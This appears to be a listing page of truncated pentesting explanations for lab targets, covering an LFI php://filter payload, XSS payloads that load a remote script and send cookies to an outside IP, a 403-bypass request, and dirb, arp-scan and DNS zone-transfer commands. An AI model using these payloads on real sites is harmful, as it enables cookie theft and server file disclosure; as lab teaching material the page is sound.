LFI Inclusion http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/?file=pHp://FilTer/convert.base64-encode/resource=index.html This is a crafted Local File Inclusion (LFI) payload that lever...

XSS Professional Explanation of Payload <script src="http://192.168.155.224:80/test.txt"></script> <script>var i=new Image();i.src="http://192.168.155.224:80/?c="+document["co...

403 bypasser Explanation of the Request: The provided HTTP request is as follows: GET /2e81eb4e952a3268babddecad2a4ec1e.php HTTP/1.1 Host: merchan.thl Referer: http://merchan.thl/ Cache-Control:...

Dirb dirb http://merchan.thl This command uses DIRB, a web content scanner, to perform a brute-force discovery of hidden directories and files on the target web server http://merchan.thl. Bre...

Arp-Scan sudo arp-scan -I eth1 --localnet This command performs an ARP (Address Resolution Protocol) scan across the local network to identify active devices and their MAC addresses. Breakdown ...

Dig For Pentesting dig AXFR bestfestivalcompany.thm @10.10.13.46 What This Command Does dig: DNS lookup utility used for querying Domain Name System servers. AXFR: Stands fo...